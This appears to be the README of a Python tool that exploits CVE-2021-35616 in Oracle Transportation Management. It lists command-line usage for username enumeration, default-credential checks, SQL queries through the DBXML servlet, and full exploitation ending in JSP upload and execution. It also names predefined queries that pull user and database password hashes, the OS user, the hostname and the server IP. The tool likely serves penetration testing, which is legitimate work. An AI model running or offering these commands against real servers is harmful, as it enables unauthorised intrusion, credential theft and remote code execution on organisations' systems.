# OracleOTM
Python tool for exploiting CVE-2021-35616 

The script works in modules, which I implemented in the following order:

►	Username enumeration

►	Search for default credentials

►	Run an SQL query using DBXML servlet

►	Full exploitation and JSP execution

The syntax of the script is as follows: 

.\ {module} {host TXT file} {additional parameters}

Username enumeration: .\ enum {hosts TXT file} -u users.txt

Search for default credentials: .\ default {hosts TXT file}

Run an SQL query using DBXML servlet:	.\ query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q "select 1 from dual"

I also prepared some predefined queries that I found useful; you can access them directly, as follows:

.\ query {hosts TXT file} -uq EBS.ADMIN -pq Aa123123 -q os 

    OS – Extract the server’s OS 

    Osuser – Extract the OS user running the DB

    Hostname – DB server host name 

    Hostip – DB server IP address 

    Passwords – Extracts the OTM users and their hashed passwords

     Oraversion – The DB version 

    Dbusershash – The DB users’ password hashes

    Dbfileslocation – The location of the DB files in the OS

Full exploitation and JSP execution:	.\ exploit {hosts TXT file} -lu EBS.ADMIN -lp Aa123123 -pf "C:\Users\user\Desktop\Header_notepad.jspx"